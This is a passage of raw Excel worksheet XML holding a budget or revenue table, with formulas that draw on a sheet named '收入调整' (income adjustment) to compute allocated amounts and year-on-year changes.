    </row>
    <row r="4" spans="1:8" s="32" customFormat="1" ht="13.5" customHeight="1">
      <c r="A4" s="5" t="s">
        <v>23</v>
      </c>
      <c r="B4" s="5">
        <f>SUM(B5:B20)-1</f>
        <v>76299.774999999994</v>
      </c>
      <c r="C4" s="5">
        <f>SUM(C5:C20)</f>
        <v>58457.05</v>
      </c>
      <c r="D4" s="5">
        <f>SUM(D5:D20)</f>
        <v>42657.61</v>
      </c>
      <c r="E4" s="5">
        <f>SUM(E5:E20)</f>
        <v>-19960.45</v>
      </c>
      <c r="F4" s="5">
        <f>SUM(F5:F20)-0.5</f>
        <v>56339.425000000003</v>
      </c>
      <c r="G4" s="36">
        <f>(F4-C4)/C4</f>
        <v>-3.6225314140894894E-2</v>
      </c>
      <c r="H4" s="5"/>
    </row>
    <row r="5" spans="1:8" ht="13.5" customHeight="1">
      <c r="A5" s="3" t="s">
        <v>25</v>
      </c>
      <c r="B5" s="3">
        <f>收入调整!B6*0.375</f>
        <v>20542.875</v>
      </c>
      <c r="C5" s="3">
        <v>10964</v>
      </c>
      <c r="D5" s="3">
        <f>收入调整!D6*0.375</f>
        <v>14973</v>
      </c>
      <c r="E5" s="3">
        <f>收入调整!F6*0.375</f>
        <v>-1597.5</v>
      </c>
      <c r="F5" s="3">
        <f>B5+E5</f>
        <v>18945.375</v>
      </c>
      <c r="G5" s="37">
        <f t="shared" ref="G5" si="0">(F5-C5)/C5</f>
        <v>0.7279619664356074</v>
      </c>
      <c r="H5" s="3"/>
    </row>
    <row r="6" spans="1:8" ht="13.5" customHeight="1">
      <c r="A6" s="3" t="s">
        <v>27</v>
      </c>
      <c r="B6" s="3"/>
      <c r="C6" s="3"/>
      <c r="D6" s="3"/>
      <c r="E6" s="3"/>
      <c r="F6" s="3">
        <f t="shared" ref="F6" si="1">B6+E6</f>
        <v>0</v>
      </c>
      <c r="G6" s="37" t="e">
        <f t="shared" ref="G6:G53" si="2">(F6-C6)/C6</f>
        <v>#DIV/0!</v>
      </c>
      <c r="H6" s="3"/>
    </row>
    <row r="7" spans="1:8" ht="13.5" customHeight="1">
      <c r="A7" s="3" t="s">
        <v>29</v>
      </c>
      <c r="B7" s="3">
        <f>(收入调整!B8+收入调整!B12)*0.28+0.4</f>
        <v>3276.4000000000005</v>
      </c>
      <c r="C7" s="3">
        <f>(收入调整!C8+收入调整!C12)*0.28+0.4</f>
        <v>2877.4000000000005</v>
      </c>
      <c r="D7" s="3">
        <f>(收入调整!D8+收入调整!D12)*0.28+0.4</f>
        <v>2363.6000000000004</v>
      </c>
      <c r="E7" s="3">
        <f>(收入调整!F8+收入调整!F12)*0.28</f>
        <v>-11.200000000000001</v>
      </c>
      <c r="F7" s="3">
        <f>B7+E7</f>
        <v>3265.2000000000007</v>
      </c>
      <c r="G7" s="37">
        <f t="shared" si="2"/>
        <v>0.13477444915548764</v>
      </c>
      <c r="H7" s="3"/>
    </row>
    <row r="8" spans="1:8" ht="13.5" customHeight="1">
      <c r="A8" s="3" t="s">
        <v>31</v>
      </c>
      <c r="B8" s="3">
        <f>(收入调整!B9+收入调整!B14)*0.28</f>
        <v>1484.0000000000002</v>
      </c>
      <c r="C8" s="3">
        <f>(收入调整!C9+收入调整!C14)*0.28</f>
        <v>1341.2</v>
      </c>
      <c r="D8" s="3">
        <f>(收入调整!D9+收入调整!D14)*0.28</f>
        <v>1478.96</v>
      </c>
      <c r="E8" s="3">
        <f>(收入调整!F9+收入调整!F14)*0.28</f>
        <v>476.00000000000006</v>
      </c>
      <c r="F8" s="3">
        <f>B8+E8</f>
        <v>1960.0000000000002</v>
      </c>
      <c r="G8" s="37">
        <f t="shared" si="2"/>
        <v>0.46137787056367446</v>
      </c>
      <c r="H8" s="3"/>
    </row>
    <row r="9" spans="1:8" ht="13.5" customHeight="1">
      <c r="A9" s="3" t="s">
        <v>33</v>
      </c>
      <c r="B9" s="3">
        <f>收入调整!B13*0.28</f>
        <v>0</v>
      </c>
      <c r="C9" s="3"/>
      <c r="D9" s="3"/>
      <c r="E9" s="3"/>
      <c r="F9" s="3">
        <f>B9+E9</f>
        <v>0</v>
      </c>
      <c r="G9" s="37" t="e">
        <f t="shared" si="2"/>
        <v>#DIV/0!</v>
      </c>
      <c r="H9" s="3"/>
    </row>
    <row r="10" spans="1:8" ht="13.5" customHeight="1">
      <c r="A10" s="3" t="s">
        <v>35</v>
      </c>
      <c r="B10" s="3">
        <f>收入调整!B11*0.375</f>
        <v>112.5</v>
      </c>
      <c r="C10" s="3">
        <v>6966</v>
      </c>
      <c r="D10" s="3">
        <f>收入调整!D11*0.375</f>
        <v>221.25</v>
      </c>
      <c r="E10" s="3">
        <f>收入调整!F11*0.375</f>
        <v>131.25</v>
      </c>
      <c r="F10" s="3">
        <f>B10+E10-0.4</f>
        <v>243.35</v>
      </c>
      <c r="G10" s="37">
        <f t="shared" si="2"/>
        <v>-0.96506603502727528</v>
      </c>
      <c r="H10" s="3"/>
    </row>
    <row r="11" spans="1:8" ht="13.5" customHeight="1">
      <c r="A11" s="3" t="s">
        <v>37</v>
      </c>
      <c r="B11" s="3">
        <f>收入调整!B15*0.75</f>
        <v>75</v>
      </c>
      <c r="C11" s="3">
        <f>收入调整!C15*0.75</f>
        <v>63.75</v>
      </c>
      <c r="D11" s="3">
        <f>收入调整!D15*0.75</f>
        <v>39</v>
      </c>
      <c r="E11" s="3">
        <f>收入调整!F15*0.75</f>
        <v>-15</v>
      </c>
      <c r="F11" s="3">
        <f t="shared" ref="F11" si="3">B11+E11</f>
        <v>60</v>
      </c>
      <c r="G11" s="37">
        <f t="shared" si="2"/>
        <v>-5.8823529411764705E-2</v>
      </c>
      <c r="H11" s="3"/>
    </row>
    <row r="12" spans="1:8" ht="13.5" customHeight="1">
      <c r="A12" s="3" t="s">
        <v>39</v>
      </c>
      <c r="B12" s="3">
        <f>收入调整!B16</f>
        <v>2800</v>
      </c>
      <c r="C12" s="3">
        <f>收入调整!C16</f>
        <v>2412</v>
      </c>
      <c r="D12" s="3">
        <f>收入调整!D16</f>
        <v>2725</v>
      </c>
      <c r="E12" s="3">
        <f>收入调整!F16</f>
        <v>0</v>
      </c>
      <c r="F12" s="3">
        <f t="shared" ref="F12:F21" si="4">B12+E12</f>
        <v>2800</v>
      </c>
      <c r="G12" s="37">
        <f t="shared" si="2"/>
        <v>0.16086235489220563</v>
      </c>
      <c r="H12" s="3"/>
    </row>
    <row r="13" spans="1:8" ht="13.5" customHeight="1">
      <c r="A13" s="3" t="s">
        <v>41</v>
      </c>
      <c r="B13" s="3">
        <f>收入调整!B17</f>
        <v>2300</v>
      </c>
      <c r="C13" s="3">
        <f>收入调整!C17</f>
        <v>1572</v>
      </c>
      <c r="D13" s="3">
        <f>收入调整!D17</f>
        <v>1489</v>
      </c>
      <c r="E13" s="3">
        <f>收入调整!F17</f>
        <v>0</v>
      </c>
      <c r="F13" s="3">
        <f t="shared" si="4"/>
        <v>2300</v>
      </c>
      <c r="G13" s="37">
        <f t="shared" si="2"/>
        <v>0.46310432569974552</v>
      </c>
      <c r="H13" s="3"/>
    </row>
    <row r="14" spans="1:8" ht="13.5" customHeight="1">
      <c r="A14" s="3" t="s">
        <v>43</v>
      </c>
      <c r="B14" s="3">
        <f>收入调整!B18</f>
        <v>900</v>
      </c>
      <c r="C14" s="3">
        <f>收入调整!C18</f>
        <v>769</v>
      </c>
      <c r="D14" s="3">
        <f>收入调整!D18</f>
        <v>921</v>
      </c>
      <c r="E14" s="3">
        <f>收入调整!F18</f>
        <v>50</v>
      </c>
      <c r="F14" s="3">
        <f t="shared" si="4"/>
        <v>950</v>
      </c>
      <c r="G14" s="37">
        <f t="shared" si="2"/>
        <v>0.23537061118335501</v>
      </c>
      <c r="H14" s="3"/>
    </row>
    <row r="15" spans="1:8" ht="13.5" customHeight="1">
      <c r="A15" s="3" t="s">
        <v>45</v>
      </c>
      <c r="B15" s="3">
        <f>收入调整!B19*0.7</f>
        <v>2310</v>
      </c>
      <c r="C15" s="3">
        <f>收入调整!C19*0.7</f>
        <v>2086.6999999999998</v>
      </c>
      <c r="D15" s="3">
        <f>收入调整!D19*0.7</f>
        <v>3110.7999999999997</v>
      </c>
      <c r="E15" s="3">
        <f>收入调整!F19*0.7</f>
        <v>700</v>
      </c>
      <c r="F15" s="3">
        <f t="shared" si="4"/>
        <v>3010</v>
      </c>
      <c r="G15" s="37">
        <f t="shared" si="2"/>
        <v>0.44246897014424702</v>
      </c>
      <c r="H15" s="3"/>
    </row>
    <row r="16" spans="1:8" ht="13.5" customHeight="1">
      <c r="A16" s="3" t="s">
        <v>47</v>
      </c>
      <c r="B16" s="3">
        <f>收入调整!B20</f>
        <v>12000</v>
      </c>
      <c r="C16" s="3">
        <f>收入调整!C20</f>
        <v>9371</v>
      </c>
      <c r="D16" s="3">
        <f>收入调整!D20</f>
        <v>6443</v>
      </c>
      <c r="E16" s="3">
        <f>收入调整!F20</f>
        <v>-3300</v>
      </c>
      <c r="F16" s="3">
        <f t="shared" si="4"/>
        <v>8700</v>
      </c>
      <c r="G16" s="37">
        <f t="shared" si="2"/>
        <v>-7.1603884323978226E-2</v>
      </c>
      <c r="H16" s="3"/>
    </row>
    <row r="17" spans="1:8" ht="13.5" customHeight="1">
      <c r="A17" s="3" t="s">
        <v>49</v>
      </c>
      <c r="B17" s="3">
        <f>收入调整!B21</f>
        <v>700</v>
      </c>
      <c r="C17" s="3">
        <f>收入调整!C21</f>
        <v>637</v>
      </c>
      <c r="D17" s="3">
        <f>收入调整!D21</f>
        <v>586</v>
      </c>
      <c r="E17" s="3">
        <f>收入调整!F21</f>
        <v>0</v>
      </c>
      <c r="F17" s="3">
        <f t="shared" si="4"/>
        <v>700</v>
      </c>
      <c r="G17" s="37">
        <f t="shared" si="2"/>
        <v>9.8901098901098897E-2</v>
      </c>
      <c r="H17" s="3"/>
    </row>
    <row r="18" spans="1:8" ht="13.5" customHeight="1">
      <c r="A18" s="3" t="s">
        <v>51</v>
      </c>
      <c r="B18" s="3">
        <f>收入调整!B22</f>
        <v>2600</v>
      </c>
      <c r="C18" s="3">
        <f>收入调整!C22</f>
        <v>2496</v>
      </c>
      <c r="D18" s="3">
        <f>收入调整!D22</f>
        <v>500</v>
      </c>
      <c r="E18" s="3">
        <f>收入调整!F22</f>
        <v>-150</v>
      </c>
      <c r="F18" s="3">
        <f t="shared" si="4"/>
        <v>2450</v>
      </c>
      <c r="G18" s="37">
        <f t="shared" si="2"/>
        <v>-1.842948717948718E-2</v>
      </c>
      <c r="H18" s="3"/>
    </row>
    <row r="19" spans="1:8" ht="13.5" customHeight="1">
      <c r="A19" s="3" t="s">
        <v>53</v>
      </c>
      <c r="B19" s="3">
        <f>收入调整!B23</f>
        <v>8700</v>
      </c>
      <c r="C19" s="3">
        <f>收入调整!C23</f>
        <v>5811</v>
      </c>
      <c r="D19" s="3">
        <f>收入调整!D23</f>
        <v>2013</v>
      </c>
      <c r="E19" s="3">
        <f>收入调整!F23</f>
        <v>-5700</v>
      </c>
      <c r="F19" s="3">
        <f t="shared" si="4"/>
        <v>3000</v>
      </c>
      <c r="G19" s="37">
        <f t="shared" si="2"/>
        <v>-0.48373773877129583</v>
      </c>
      <c r="H19" s="3"/>
    </row>
    <row r="20" spans="1:8" ht="13.5" customHeight="1">
      <c r="A20" s="3" t="s">
        <v>55</v>
      </c>
      <c r="B20" s="3">
        <f>收入调整!B24</f>
        <v>18500</v>
      </c>
      <c r="C20" s="3">
        <f>收入调整!C24</f>
        <v>11090</v>
      </c>
      <c r="D20" s="3">
        <f>收入调整!D24</f>
        <v>5794</v>
      </c>
      <c r="E20" s="3">
        <f>收入调整!F24</f>
        <v>-10544</v>
      </c>
      <c r="F20" s="3">
        <f t="shared" si="4"/>
        <v>7956</v>
      </c>
      <c r="G20" s="37">
        <f t="shared" si="2"/>
        <v>-0.28259693417493237</v>
      </c>
      <c r="H20" s="3"/>
    </row>
    <row r="21" spans="1:8" s="32" customFormat="1" ht="13.5" customHeight="1">
      <c r="A21" s="5" t="s">
        <v>57</v>
      </c>
      <c r="B21" s="5">
        <f>B22+B35+B36+B37+B38</f>
        <v>56248</v>
      </c>
      <c r="C21" s="5">
        <f>C22+C35+C36+C37+C38</f>
        <v>75616</v>
      </c>
      <c r="D21" s="5">
        <f>D22+D35+D36+D37+D38</f>
        <v>48204</v>
      </c>
      <c r="E21" s="5">
        <f>E22+E35+E36+E37+E38</f>
        <v>9666</v>
      </c>
      <c r="F21" s="5">
        <f t="shared" si="4"/>
        <v>65914</v>
      </c>
      <c r="G21" s="36">
        <f t="shared" si="2"/>
        <v>-0.12830617858654253</v>
      </c>
      <c r="H21" s="5"/>
    </row>
    <row r="22" spans="1:8" ht="13.5" customHeight="1">
      <c r="A22" s="3" t="s">
        <v>59</v>
      </c>
      <c r="B22" s="3">
        <f t="shared" ref="B22" si="5">SUM(B23:B34)</f>
        <v>5410</v>
      </c>
      <c r="C22" s="3">
        <f>SUM(C23:C34)</f>
        <v>5045</v>
      </c>
      <c r="D22" s="3">
        <f>SUM(D23:D34)</f>
        <v>3133</v>
      </c>
      <c r="E22" s="3">
        <f>SUM(E23:E34)</f>
        <v>1014</v>
      </c>
      <c r="F22" s="3">
        <f>SUM(F23:F34)</f>
        <v>6424</v>
      </c>
      <c r="G22" s="37">
        <f t="shared" si="2"/>
        <v>0.27333994053518335</v>
      </c>
      <c r="H22" s="3"/>
    </row>
    <row r="23" spans="1:8" ht="13.5" hidden="1" customHeight="1">
      <c r="A23" s="3" t="s">
        <v>142</v>
      </c>
      <c r="B23" s="3">
        <f>收入调整!B31</f>
        <v>700</v>
      </c>
      <c r="C23" s="3">
        <f>收入调整!C31</f>
        <v>673</v>
      </c>
      <c r="D23" s="3">
        <f>收入调整!D31</f>
        <v>0</v>
      </c>
      <c r="E23" s="3">
        <f>收入调整!F31</f>
        <v>0</v>
      </c>
      <c r="F23" s="3">
        <f t="shared" ref="F23" si="6">B23+E23</f>
        <v>700</v>
      </c>
      <c r="G23" s="37">
        <f t="shared" si="2"/>
        <v>4.0118870728083213E-2</v>
      </c>
      <c r="H23" s="3"/>
    </row>
    <row r="24" spans="1:8" ht="13.5" hidden="1" customHeight="1">
      <c r="A24" s="3" t="s">
        <v>143</v>
      </c>
      <c r="B24" s="3">
        <f>收入调整!B32</f>
        <v>60</v>
      </c>
      <c r="C24" s="3">
        <f>收入调整!C32</f>
        <v>0</v>
      </c>
      <c r="D24" s="3">
        <f>收入调整!D32</f>
        <v>0</v>
      </c>
      <c r="E24" s="3">
        <f>收入调整!F32</f>
        <v>0</v>
      </c>
      <c r="F24" s="3">
        <f t="shared" ref="F24:F39" si="7">B24+E24</f>
        <v>60</v>
      </c>
      <c r="G24" s="37" t="e">
        <f t="shared" si="2"/>
        <v>#DIV/0!</v>
      </c>
      <c r="H24" s="3"/>
    </row>
    <row r="25" spans="1:8" ht="13.5" hidden="1" customHeight="1">
      <c r="A25" s="3" t="s">
        <v>144</v>
      </c>
      <c r="B25" s="3">
        <f>收入调整!B33</f>
        <v>0</v>
      </c>
      <c r="C25" s="3">
        <f>收入调整!C33</f>
        <v>0</v>
      </c>
      <c r="D25" s="3">
        <f>收入调整!D33</f>
        <v>0</v>
      </c>
      <c r="E25" s="3">
        <f>收入调整!F33</f>
        <v>0</v>
      </c>
      <c r="F25" s="3">
        <f t="shared" si="7"/>
        <v>0</v>
      </c>
      <c r="G25" s="37" t="e">
        <f t="shared" si="2"/>
        <v>#DIV/0!</v>
      </c>
      <c r="H25" s="3"/>
    </row>
    <row r="26" spans="1:8" ht="13.5" hidden="1" customHeight="1">
      <c r="A26" s="3" t="s">
        <v>145</v>
      </c>
      <c r="B26" s="3">
        <f>收入调整!B34</f>
        <v>40</v>
      </c>
      <c r="C26" s="3">
        <f>收入调整!C34</f>
        <v>0</v>
      </c>
      <c r="D26" s="3">
        <f>收入调整!D34</f>
        <v>0</v>
      </c>
      <c r="E26" s="3">
        <f>收入调整!F34</f>
        <v>0</v>
      </c>
      <c r="F26" s="3">
        <f t="shared" si="7"/>
        <v>40</v>
      </c>
      <c r="G26" s="37" t="e">
        <f t="shared" si="2"/>
        <v>#DIV/0!</v>
      </c>
      <c r="H26" s="3"/>
    </row>
    <row r="27" spans="1:8" ht="13.5" hidden="1" customHeight="1">
      <c r="A27" s="3" t="s">
        <v>146</v>
      </c>
      <c r="B27" s="3">
        <f>收入调整!B35</f>
        <v>400</v>
      </c>
      <c r="C27" s="3">
        <f>收入调整!C35</f>
        <v>395</v>
      </c>
      <c r="D27" s="3">
        <f>收入调整!D35+收入调整!D27</f>
        <v>295</v>
      </c>
      <c r="E27" s="3">
        <f>收入调整!F35+收入调整!F27</f>
        <v>164</v>
      </c>
      <c r="F27" s="3">
        <f t="shared" si="7"/>
        <v>564</v>
      </c>
      <c r="G27" s="37">
        <f t="shared" si="2"/>
        <v>0.42784810126582279</v>
      </c>
      <c r="H27" s="3"/>
    </row>
    <row r="28" spans="1:8" ht="13.5" hidden="1" customHeight="1">
      <c r="A28" s="3" t="s">
        <v>155</v>
      </c>
      <c r="B28" s="3">
        <f>收入调整!B25</f>
        <v>1200</v>
      </c>
      <c r="C28" s="3">
        <f>收入调整!C25</f>
        <v>1168</v>
      </c>
      <c r="D28" s="3">
        <f>收入调整!D25</f>
        <v>1275</v>
      </c>
      <c r="E28" s="3">
        <f>收入调整!F25</f>
        <v>300</v>
      </c>
      <c r="F28" s="3">
        <f t="shared" si="7"/>
        <v>1500</v>
      </c>
      <c r="G28" s="37">
        <f t="shared" si="2"/>
        <v>0.28424657534246578</v>
      </c>
      <c r="H28" s="3"/>
    </row>
    <row r="29" spans="1:8" ht="13.5" hidden="1" customHeight="1">
      <c r="A29" s="3" t="s">
        <v>156</v>
      </c>
      <c r="B29" s="3">
        <f>收入调整!B26</f>
        <v>800</v>
      </c>
      <c r="C29" s="3">
        <f>收入调整!C26</f>
        <v>776</v>
      </c>
      <c r="D29" s="3">
        <f>收入调整!D26</f>
        <v>884</v>
      </c>
      <c r="E29" s="3">
        <f>收入调整!F26</f>
        <v>200</v>
      </c>
      <c r="F29" s="3">
        <f t="shared" si="7"/>
        <v>1000</v>
      </c>
      <c r="G29" s="37">
        <f t="shared" si="2"/>
        <v>0.28865979381443296</v>
      </c>
      <c r="H29" s="3"/>
    </row>
    <row r="30" spans="1:8" ht="13.5" hidden="1" customHeight="1">
      <c r="A30" s="3" t="s">
        <v>147</v>
      </c>
      <c r="B30" s="3">
        <f>收入调整!B36</f>
        <v>600</v>
      </c>
      <c r="C30" s="3">
        <f>收入调整!C36</f>
        <v>569</v>
      </c>
      <c r="D30" s="3">
        <f>收入调整!D36</f>
        <v>186</v>
      </c>
      <c r="E30" s="3">
        <f>收入调整!F36</f>
        <v>0</v>
      </c>
      <c r="F30" s="3">
        <f t="shared" si="7"/>
        <v>600</v>
      </c>
      <c r="G30" s="37">
        <f t="shared" si="2"/>
        <v>5.4481546572934976E-2</v>
      </c>
      <c r="H30" s="3"/>
    </row>
    <row r="31" spans="1:8" ht="13.5" hidden="1" customHeight="1">
      <c r="A31" s="3" t="s">
        <v>148</v>
      </c>
      <c r="B31" s="3">
        <f>收入调整!B37</f>
        <v>400</v>
      </c>
      <c r="C31" s="3">
        <f>收入调整!C37</f>
        <v>343</v>
      </c>
      <c r="D31" s="3">
        <f>收入调整!D37</f>
        <v>108</v>
      </c>
      <c r="E31" s="3">
        <f>收入调整!F37</f>
        <v>0</v>
      </c>
      <c r="F31" s="3">
        <f t="shared" si="7"/>
        <v>400</v>
      </c>
      <c r="G31" s="37">
        <f t="shared" si="2"/>
        <v>0.16618075801749271</v>
      </c>
      <c r="H31" s="3"/>
    </row>
    <row r="32" spans="1:8" ht="13.5" hidden="1" customHeight="1">
      <c r="A32" s="3" t="s">
        <v>149</v>
      </c>
      <c r="B32" s="3">
        <f>收入调整!B38</f>
        <v>10</v>
      </c>
      <c r="C32" s="3">
        <f>收入调整!C38</f>
        <v>5</v>
      </c>
      <c r="D32" s="3">
        <f>收入调整!D38</f>
        <v>0</v>
      </c>
      <c r="E32" s="3">
        <f>收入调整!F38</f>
        <v>0</v>
      </c>
      <c r="F32" s="3">
        <f t="shared" si="7"/>
        <v>10</v>
      </c>
      <c r="G32" s="37">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="H32" s="3"/>
    </row>
    <row r="33" spans="1:8" ht="13.5" hidden="1" customHeight="1">
      <c r="A33" s="3" t="s">
        <v>150</v>
      </c>
      <c r="B33" s="3">
        <f>收入调整!B39</f>
        <v>600</v>
      </c>
      <c r="C33" s="3">
        <f>收入调整!C39</f>
        <v>538</v>
      </c>
      <c r="D33" s="3">
        <f>收入调整!D39</f>
        <v>93</v>
      </c>
      <c r="E33" s="3">
        <f>收入调整!F39</f>
        <v>0</v>
      </c>
      <c r="F33" s="3">
        <f t="shared" si="7"/>
        <v>600</v>
      </c>
      <c r="G33" s="37">
        <f t="shared" si="2"/>
        <v>0.11524163568773234</v>
      </c>
      <c r="H33" s="3"/>
    </row>
    <row r="34" spans="1:8" ht="13.5" hidden="1" customHeight="1">
      <c r="A34" s="3" t="s">
        <v>151</v>
      </c>
      <c r="B34" s="3">
        <f>收入调整!B40</f>
        <v>600</v>
      </c>
      <c r="C34" s="3">
        <f>收入调整!C40</f>
        <v>578</v>
      </c>
      <c r="D34" s="3">
        <f>收入调整!D40+收入调整!D28</f>
        <v>292</v>
      </c>
      <c r="E34" s="3">
        <f>收入调整!F40+收入调整!F28</f>
        <v>350</v>
      </c>
      <c r="F34" s="3">
        <f t="shared" si="7"/>
        <v>950</v>
      </c>
      <c r="G34" s="37">
        <f t="shared" si="2"/>
        <v>0.643598615916955</v>
      </c>
      <c r="H34" s="3"/>
    </row>
    <row r="35" spans="1:8" ht="13.5" customHeight="1">
      <c r="A35" s="3" t="s">
        <v>61</v>
      </c>
      <c r="B35" s="3">
        <f>收入调整!B41</f>
        <v>39400</v>
      </c>
      <c r="C35" s="3">
        <f>收入调整!C41</f>
        <v>40303</v>
      </c>
      <c r="D35" s="3">
        <f>收入调整!D41</f>
        <v>33489</v>
      </c>
      <c r="E35" s="3">
        <f>收入调整!F41</f>
        <v>2400</v>
      </c>
      <c r="F35" s="3">
        <f t="shared" si="7"/>
        <v>41800</v>
      </c>
      <c r="G35" s="37">
        <f t="shared" si="2"/>
        <v>3.7143636950102969E-2</v>
      </c>
      <c r="H35" s="3"/>
    </row>
    <row r="36" spans="1:8" ht="13.5" customHeight="1">
      <c r="A36" s="3" t="s">
        <v>63</v>
      </c>
      <c r="B36" s="3">
        <f>收入调整!B42</f>
        <v>6000</v>
      </c>
      <c r="C36" s="3">
        <f>收入调整!C42</f>
        <v>9101</v>
      </c>
      <c r="D36" s="3">
        <f>收入调整!D42</f>
        <v>5197</v>
      </c>
      <c r="E36" s="3">
        <f>收入调整!F42</f>
        <v>3600</v>
      </c>
      <c r="F36" s="3">
        <f t="shared" si="7"/>
        <v>9600</v>
      </c>
      <c r="G36" s="37">
        <f t="shared" si="2"/>
        <v>5.482913965498297E-2</v>
      </c>
      <c r="H36" s="3"/>
    </row>
    <row r="37" spans="1:8" ht="13.5" customHeight="1">
      <c r="A37" s="3" t="s">
        <v>65</v>
      </c>
      <c r="B37" s="3">
        <f>收入调整!B43</f>
        <v>5438</v>
      </c>
      <c r="C37" s="3">
        <f>收入调整!C43</f>
        <v>6545</v>
      </c>
      <c r="D37" s="3">
        <f>收入调整!D43</f>
        <v>4084</v>
      </c>
      <c r="E37" s="3">
        <f>收入调整!F43</f>
        <v>300</v>
      </c>
      <c r="F37" s="3">
        <f t="shared" si="7"/>
        <v>5738</v>
      </c>
      <c r="G37" s="37">
        <f t="shared" si="2"/>
        <v>-0.12330022918258213</v>
      </c>
      <c r="H37" s="3"/>
    </row>
    <row r="38" spans="1:8" ht="13.5" customHeight="1">
      <c r="A38" s="3" t="s">
        <v>67</v>
      </c>
      <c r="B38" s="3">
        <f>收入调整!B44</f>
        <v>0</v>
      </c>
      <c r="C38" s="3">
        <f>收入调整!C44</f>
        <v>14622</v>
      </c>
      <c r="D38" s="3">
        <f>收入调整!D44</f>
        <v>2301</v>
      </c>
      <c r="E38" s="3">
        <f>收入调整!F44</f>
        <v>2352</v>
      </c>
      <c r="F38" s="3">
        <f t="shared" si="7"/>
        <v>2352</v>
      </c>
      <c r="G38" s="37">
        <f t="shared" si="2"/>
        <v>-0.83914649158801802</v>
      </c>
      <c r="H38" s="3"/>
    </row>
    <row r="39" spans="1:8" s="32" customFormat="1" ht="13.5" customHeight="1">
      <c r="A39" s="5" t="s">
        <v>157</v>
      </c>
      <c r="B39" s="5">
        <f>B4+B21</f>
        <v>132547.77499999999</v>
      </c>
      <c r="C39" s="5">
        <f>C4+C21</f>
        <v>134073.04999999999</v>
      </c>
      <c r="D39" s="5">
        <f>D4+D21</f>
        <v>90861.61</v>
      </c>
      <c r="E39" s="5">
        <f>E4+E21</f>
        <v>-10294.450000000001</v>
      </c>
      <c r="F39" s="5">
        <f t="shared" si="7"/>
        <v>122253.325</v>
      </c>
      <c r="G39" s="36">
        <f t="shared" si="2"/>
        <v>-8.815884325746294E-2</v>
      </c>
      <c r="H39" s="5"/>
    </row>
    <row r="40" spans="1:8" s="32" customFormat="1" ht="13.5" customHeight="1">
      <c r="A40" s="5" t="s">
        <v>158</v>
      </c>
      <c r="B40" s="5">
        <f t="shared" ref="B40" si="8">SUM(B41:B43)</f>
        <v>37759.5</v>
      </c>
      <c r="C40" s="5">
        <f>SUM(C41:C43)</f>
        <v>25683</v>
      </c>
      <c r="D40" s="5">
        <f>SUM(D41:D43)</f>
        <v>28504.199999999997</v>
      </c>
      <c r="E40" s="5">
        <f>SUM(E41:E43)</f>
        <v>-958</v>
      </c>
      <c r="F40" s="5">
        <f>SUM(F41:F43)</f>
        <v>36801.5</v>
      </c>
      <c r="G40" s="36">
        <f t="shared" si="2"/>
        <v>0.43291282171085932</v>
      </c>
      <c r="H40" s="5"/>
    </row>
    <row r="41" spans="1:8">
      <c r="A41" s="3" t="s">
        <v>159</v>
      </c>
      <c r="B41" s="3">
        <f>收入调整!B6*0.5+收入调整!B7</f>
        <v>27409.5</v>
      </c>
      <c r="C41" s="3">
        <v>16131</v>
      </c>
      <c r="D41" s="3">
        <f>收入调整!D6*0.5+收入调整!D7</f>
        <v>19976</v>
      </c>
      <c r="E41" s="3">
        <f>收入调整!F7+收入调整!F6*0.5</f>
        <v>-2130</v>
      </c>
      <c r="F41" s="3">
        <f t="shared" ref="F41" si="9">B41+E41</f>
        <v>25279.5</v>
      </c>
      <c r="G41" s="37">
        <f t="shared" si="2"/>
        <v>0.56713780918727918</v>
      </c>
      <c r="H41" s="3"/>
    </row>
    <row r="42" spans="1:8">
      <c r="A42" s="3" t="s">
        <v>160</v>
      </c>
      <c r="B42" s="3">
        <f>(收入调整!B8+收入调整!B12+收入调整!B9+收入调整!B14)*0.6</f>
        <v>10200</v>
      </c>
      <c r="C42" s="3">
        <f>(收入调整!C8+收入调整!C12+收入调整!C9+收入调整!C14)*0.6</f>
        <v>9039</v>
      </c>
      <c r="D42" s="3">
        <f>(收入调整!D8+收入调整!D12+收入调整!D9+收入调整!D14)*0.6</f>
        <v>8233.1999999999989</v>
      </c>
      <c r="E42" s="3">
        <f>(收入调整!F8+收入调整!F9+收入调整!F12+收入调整!F14)*0.6+1</f>
        <v>997</v>
      </c>
      <c r="F42" s="3">
        <f>B42+E42</f>
        <v>11197</v>
      </c>
      <c r="G42" s="37">
        <f t="shared" si="2"/>
        <v>0.23874322380794336</v>
      </c>
      <c r="H42" s="3"/>
    </row>
    <row r="43" spans="1:8">
      <c r="A43" s="3" t="s">
        <v>161</v>
      </c>
      <c r="B43" s="3">
        <f>收入调整!B11*0.5</f>
        <v>150</v>
      </c>
      <c r="C43" s="3">
        <v>513</v>
      </c>
      <c r="D43" s="3">
        <f>收入调整!D11*0.5</f>
        <v>295</v>
      </c>
      <c r="E43" s="3">
        <f>收入调整!F11*0.5</f>
        <v>175</v>
      </c>
      <c r="F43" s="3">
        <f>B43+E43</f>
        <v>325</v>
      </c>
      <c r="G43" s="37">
        <f t="shared" si="2"/>
        <v>-0.3664717348927875</v>
      </c>
      <c r="H43" s="3"/>
    </row>
    <row r="44" spans="1:8" s="32" customFormat="1">
      <c r="A44" s="5" t="s">
        <v>162</v>
      </c>
      <c r="B44" s="5">
        <f t="shared" ref="B44" si="10">SUM(B45:B49)</f>
        <v>9940.125</v>
      </c>
      <c r="C44" s="5">
        <f>SUM(C45:C49)</f>
        <v>8700.35</v>
      </c>
      <c r="D44" s="5">
        <f>SUM(D45:D49)</f>
        <v>8057.5899999999992</v>
      </c>
      <c r="E44" s="5">
        <f>SUM(E45:E49)</f>
        <v>5.4499999999999886</v>
      </c>
      <c r="F44" s="5">
        <f>SUM(F45:F49)</f>
        <v>9945.5750000000007</v>
      </c>
      <c r="G44" s="36">
        <f t="shared" si="2"/>
        <v>0.1431235525007615</v>
      </c>
      <c r="H44" s="5"/>
    </row>
    <row r="45" spans="1:8">
      <c r="A45" s="3" t="s">
        <v>163</v>
      </c>
      <c r="B45" s="3">
        <f>收入调整!B6*0.125</f>
        <v>6847.625</v>
      </c>
      <c r="C45" s="3">
        <v>3655</v>
      </c>
      <c r="D45" s="3">
        <f>收入调整!D6*0.125</f>
        <v>4991</v>
      </c>
      <c r="E45" s="3">
        <f>收入调整!F6*0.125</f>
        <v>-532.5</v>
      </c>
      <c r="F45" s="3">
        <f t="shared" ref="F45" si="11">B45+E45</f>
        <v>6315.125</v>
      </c>
      <c r="G45" s="37">
        <f t="shared" si="2"/>
        <v>0.72780437756497951</v>
      </c>
